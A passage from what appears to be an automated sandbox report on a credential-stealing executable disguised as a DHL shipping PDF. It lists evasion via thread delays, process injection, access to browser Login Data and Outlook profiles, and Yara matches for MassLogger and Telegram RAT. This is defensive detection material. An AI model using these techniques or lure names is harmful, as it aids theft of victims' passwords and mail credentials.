                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 1936Thread sleep count: 8362 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 1936Thread sleep count: 1487 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599124s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598249s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -598031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597921s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597702s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597253s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596973s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596621s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596464s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596249s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595921s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -595046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594936s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594499s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -594280s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597702Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597253Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596973Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596621Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596464Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594280Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4569755427.0000000001087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll,
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0536C168 LdrInitializeThunk,LdrInitializeThunk,3_2_0536C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory written: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
